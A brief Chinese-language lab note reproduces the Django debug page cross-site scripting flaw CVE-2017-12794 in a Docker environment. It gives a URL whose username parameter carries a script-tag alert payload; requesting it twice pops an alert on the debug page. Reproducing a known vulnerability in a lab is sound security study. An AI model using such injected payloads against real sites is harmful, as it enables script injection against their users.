参考:https://paper.seebug.org/402/
使用docker搭建环境
访问:http://your-ip:8000/create_user/?username=<script>alert(1)</script>
成功创建一个用户

再次访问 http://your-ip:8000/create_user/?username=<script>alert(1)</script>
触发弹窗

Django debug page XSS漏洞(CVE-2017-12794)复现
原文:https://www.cnblogs.com/rnss/p/13597549.html